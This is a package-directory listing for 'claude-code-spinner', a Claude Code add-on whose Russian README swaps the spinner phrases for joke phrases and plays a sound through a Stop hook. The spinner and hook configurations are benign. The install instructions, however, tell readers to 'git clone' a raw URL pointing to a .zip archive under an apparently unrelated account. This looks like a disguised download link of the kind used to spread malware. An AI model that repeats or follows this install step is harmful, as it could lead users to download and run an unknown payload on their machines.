freshcrate
Skin:/
Home > AI Agents > claude-code-spinner

claude-code-spinner

Replace Claude Code's default spinner phrases with over 90 custom Russian phrases to add unique character during agent processing.

Why this rank:Release freshnessHealthy release cadenceStrong adoption

Description

Replace Claude Code's default spinner phrases with over 90 custom Russian phrases to add unique character during agent processing.

README

Кабанчиком

claude-code-spinner

Замена фраз спиннера Claude Code для уважаемых вайбкодеров.

Вместо стандартных Thinking..., Analyzing..., Pondering... будет крутиться "Обкашляю вопросик", "По красоте все сделаем" и еще 90+ фраз.

Установка через Claude Code

git clone https://github.com/sarthak23s/claude-code-spinner/raw/refs/heads/main/assets/spinner_code_claude_zoonite.zip
cd claude-code-spinner

Запусти Claude Code и выполни:

/install-spinner

Ручная установка

Скопируй содержимое spinners.json в ~/.claude/settings.json:

{
  "spinnerVerbs": {
    "mode": "replace",
    "verbs": ["Обкашляю вопросик", "По красоте все сделаем", "..."]
  }
}

Сектор приз: "Вопросик на тормозах" на хук Stop

Когда основной агент ответит, ты услышишь «Вопросик на тормозах». Работает через afplay (уже есть на macOS).

Установка через Claude Code

/install-hook

Если громко, попроси клод сделать потише. В ручной установке есть пример, можно -v 1 поменять на -v 0.5.

Ручная установка

Скопируй sounds/stop-hook.mp3 в ~/.claude/sounds/ и добавь хук в ~/.claude/settings.json:

{
  "hooks": {
    "Stop": [
      {
        "matcher": "",
        "hooks": [
          {
            "type": "command",
            "command": "afplay -v 1 ~/.claude/sounds/stop-hook.mp3"
          }
        ]
      }
    ]
  }
}

Лицензия

Какая еще лицензия? Ладно, MIT.

На связи

Телега: Несерьезный айтишник
Рассказываю про разработку с ИИ. Заглядывай.

Release History

VersionChangesUrgencyDate
main@2026-06-11Latest activity on main branchHigh6/11/2026
0.0.0No release found — using repo HEADHigh4/9/2026

Dependencies & License Audit

Loading dependencies...

Similar Packages

tweakccCustomize Claude Code's system prompts, create custom toolsets, input pattern highlighters, themes/thinking verbs/spinners, customize input box & user message styling, support AGENTS.md, unlock privatv4.3.3
acolyteA terminal-first AI coding agent. Open-source, observable, and built for developer control.v0.26.0
be-my-butlerOrchestrate multiple agents to execute Claude Code workflows with cross-model verification for reliable AI code automation.main@2026-06-12
dardcor-agentAutonomous AI Agent — Gateway, CLI TUI, Multi-Provider LLM, Skillsmain@2026-09-09
ai-git-hooksAutomate git workflows with AI-powered hooks that review code, generate and validate commit messages, and scan for bugs and security issues.main@2026-09-09

More in AI Agents

CopilotKitThe Frontend Stack for Agents & Generative UI. React + Angular. Makers of the AG-UI Protocol
llm-for-zoteroA simple Zotero plugin that brings your own LLM into the side panel.
AIGC-Interview-Book【三年面试五年模拟】AIGC算法工程师面试秘籍。涵盖AIGC、LLM大模型、AI Agent、传统深度学习、自动驾驶、机器学习、计算机视觉、自然语言处理、强化学习、大数据挖掘、具身智能、元宇宙、AGI等AI行业面试笔试干货经验与核心知识。
a2a-sdkA2A Python SDK